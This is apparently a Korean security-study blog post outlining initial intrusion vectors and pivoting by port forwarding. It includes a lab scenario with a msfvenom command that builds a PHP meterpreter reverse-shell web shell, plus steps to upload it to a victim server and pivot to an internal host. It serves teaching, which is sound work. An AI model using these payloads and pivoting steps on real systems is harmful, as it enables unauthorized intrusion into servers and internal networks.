Security Project
45. 시스템 침투 / 포트포워딩
귀멸
2023. 1. 24. 13:03
1. 시스템에 침투하는 1차 지점
- 파일 업로드 취약점으로 인한 "웹쉘" 업로드
- 서버 설정 미흡 사례 - Tomcat Manager, WebDAV 취약점
- 웹 어플리케이션 취약점 사례 - SQLi, PHP Injection, Aapche Struts..
- 윈도우 어플리케이션 취약점 - BoF 취약점, RCE 취약점
- 개인 PC 대상으로 악성코드 배포
2. 포트포워딩을 이용한 2차 침투
공격자 PC → 서버 1차 침투 (웹 서버) → 내부 서버(DBMS, 로그 서버 등) → 개인 PC
- 터널링 기법 (SSH 터널링, HTTP 터널링)
- 포트포워딩 기법
공격자 A가 희생자 B 웹서버의 파일 업로드 취약점을 통해서
백도어를 업로드해 Reverse connection을 연결한 뒤,
내부서버 C로 가는 포트를 연결 시키는 시나리오
1) msfvenom 으로 웹쉘 작성
msfvenom = msfpayload + msfencoder
-p : payload 설정
┌──(root㉿kali)-[/home/kali]
└─# msfvenom -p php/meterpreter/reverse_tcp LPORT=9999 > msf_shell.php
2) msfconsole에서 handler를 열어준다.
작성한 웹쉘에 맞추어 handler 오픈
3) 희생자 B 웹서버에 파일업로드 취약점을 이용해 만든 웹쉘을 업로드 후 실행
4) 연결된 meterpreter에서 portfwd를 이용해 내부서버 C로 연결